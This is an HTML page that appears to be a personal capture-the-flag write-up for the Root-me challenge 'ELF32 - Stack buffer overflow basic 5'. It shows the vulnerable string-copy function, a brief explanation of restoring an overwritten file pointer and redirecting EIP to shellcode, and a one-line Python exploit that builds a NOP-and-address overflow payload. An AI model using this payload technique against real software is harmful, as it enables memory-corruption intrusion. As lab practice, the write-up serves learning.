<html>
 <head>
<title> Buffer 5 </title>

 <link rel="stylesheet" type="text/css" href="test1.css" />
 <link rel="stylesheet" type="text/css" href="fonts.css" />
</head>
<style>

.top {
		background:
			linear-gradient(135deg, #708090 22px, #d9ecff 22px, #d9ecff 24px, transparent 24px, transparent 67px, #d9ecff 67px, #d9ecff 69px, transparent 69px),
			linear-gradient(225deg, #708090 22px, #d9ecff 22px, #d9ecff 24px, transparent 24px, transparent 67px, #d9ecff 67px, #d9ecff 69px, transparent 69px)0 64px;
			background-color:#708090;
			background-size: 64px 128px
	width: 100%;
	height:40%; 
	}

      body {background-color:white;
	border-bottom:1px solid #bfbfbf
         line-height:1.5em;
	color:#222}
 
   p{color:black;
        /*font-style: italic;
       font-family: "Times New Roman";*/
      letter-spacing: 2px;
       font-size: 20px;
       margin-top: 10px;
       margin-bottom: 10px;
        margin-right: 150px;
       margin-left: 150px; 
       }



    h1{ color:black;
         font-style: italic;
        font-size:2.2em;
	font-family:"PT Serif","Georgia","Helvetica Neue",Arial,sans-serif;
	font-weight:normal;
	line-height:1.2em;
	margin-bottom:0.6667em
        margin-right: 150px;
       margin-left: 150px;}

code { 
display: block; white-space: pre-wrap; 
border: 1px solid #000; 
padding: 10px; 
line-height: 1.5em; 
font-family: "Lucida Console", Monaco, monospace; 
} 
.code-str 
{ color:#ff33d4; } 
 .code-comment { color:#3c33ff; } 
 .code-key { color:#9933ff; }
 .code-brown{color:#ba4a00} 


</style>
<body>

<script src="null.js"></script>

<div class = "top">
 <div style="position: absolute; bottom: 0; left: 0.5em; width: 400px; font-weight: bold; color: #fff;">
 <p style="color:white;font-size:2.2em;"> Root-me </p>
 </div>
 </div>


 <br> <br>  <br>          

<h1 class="post-title"> ELF32 - Stack buffer overflow basic 5 </h1>
   
 <br> 

<code>void cpstr(char *dst, const char *src)   #the vulnerable function
{
  for(; *src; src++, dst++)
    {
      *dst = *src;
    }
  *dst = 0;
}</code>

<br>

<p> OK this is clearly a simple buffer overflow the only problem was while overwriting stack we also overwrite file pointer which causes lil problem so we <br>
    have to restore it and then overwrite eip with our shellcode addr which is loaded via c code as seen in format bug 3 question and tht's it !!!  </p>

<br>

<code>python -c 'import struct;print "USERNAME="+"\x90"*136+struct.pack("<I",0x804b008)+"\x90"*28+struct.pack("<I",0xbffffa24)'> /tmp/siva/imp</code>

</body>
</html>
